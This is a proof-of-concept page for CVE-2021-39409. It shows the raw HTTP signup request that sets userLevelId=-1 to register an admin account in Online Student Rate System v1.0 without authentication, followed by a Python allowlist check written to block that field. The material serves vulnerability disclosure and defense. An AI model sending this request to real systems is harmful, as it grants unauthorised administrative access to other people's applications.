CVE-2021-39409 PoC — Online Student Rate System Security Vulnerability

Source
Associated Vulnerability
Title: Online Student Rate System Security Vulnerability (CVE-2021-39409)
Description: A vulnerability exists in Online Student Rate System v1.0 that allows any user to register as an administrator without needing to be authenticated.
Description
Admin account registration in Online Student Rate System
Readme
# CVE-2021-39409
Admin account registration is possible in Online Student Rate System v1.0, allowing a malicious actor to create an admin account and access the admin panel.

## Vulnerability
```
POST /ajax.php?action=signup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Origin: http://localhost
Connection: close
Referer: http://localhost

username=testaccount&passsword=098f6bcd4621d373cade4e832627b4f6&userLevelId=-1&email=example@example.com
```
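
A check a defender could place in front of the signup endpoint, as an added example that is not part of the original README or the application's own code: it parses a raw signup request and separates the fields a self-registration form may set from everything else, such as the client-supplied `userLevelId` in the request above. The allowlist and all function names are assumptions; the sample is a trimmed copy of the request shown above.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: the only fields a self-service signup should be allowed to set.
# "passsword" is spelled as it appears in the request shown above.
SIGNUP_ALLOWED = {"username", "password", "passsword", "email"}

# Trimmed copy of the request above (headers reduced for brevity).
SAMPLE = (
    "POST /ajax.php?action=signup HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "\r\n"
    "username=testaccount&passsword=098f6bcd4621d373cade4e832627b4f6"
    "&userLevelId=-1&email=example@example.com"
)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, form fields)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _version = head.split("\n", 1)[0].split(" ", 2)
    parsed = parse_qs(body.strip(), keep_blank_values=True)
    # PHP keeps the last value when a key is repeated, so mirror that here.
    fields = {name: values[-1] for name, values in parsed.items()}
    return method, target, fields

def is_signup(method, target):
    """True for POST requests to ajax.php with action=signup."""
    parts = urlsplit(target)
    return (method == "POST"
            and parts.path.endswith("/ajax.php")
            and parse_qs(parts.query).get("action") == ["signup"])

def check_signup(raw):
    """Return (accepted_fields, rejected_names), or None if not a signup request."""
    method, target, fields = parse_request(raw)
    if not is_signup(method, target):
        return None
    rejected = sorted(set(fields) - SIGNUP_ALLOWED)
    accepted = {k: v for k, v in fields.items() if k in SIGNUP_ALLOWED}
    return accepted, rejected

if __name__ == "__main__":
    accepted, rejected = check_signup(SAMPLE)
    print("accepted:", sorted(accepted))
    print("rejected:", rejected)
```

A non-empty rejected list on a signup request is worth logging and blocking; the account's privilege level should be assigned by the server, never read from the request.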

File Snapshot

[4.0K] /data/pocs/b80b82be82a4a1f58d7c4fc6368efff45d459a81
└── [ 702] README.md

0 directories, 1 file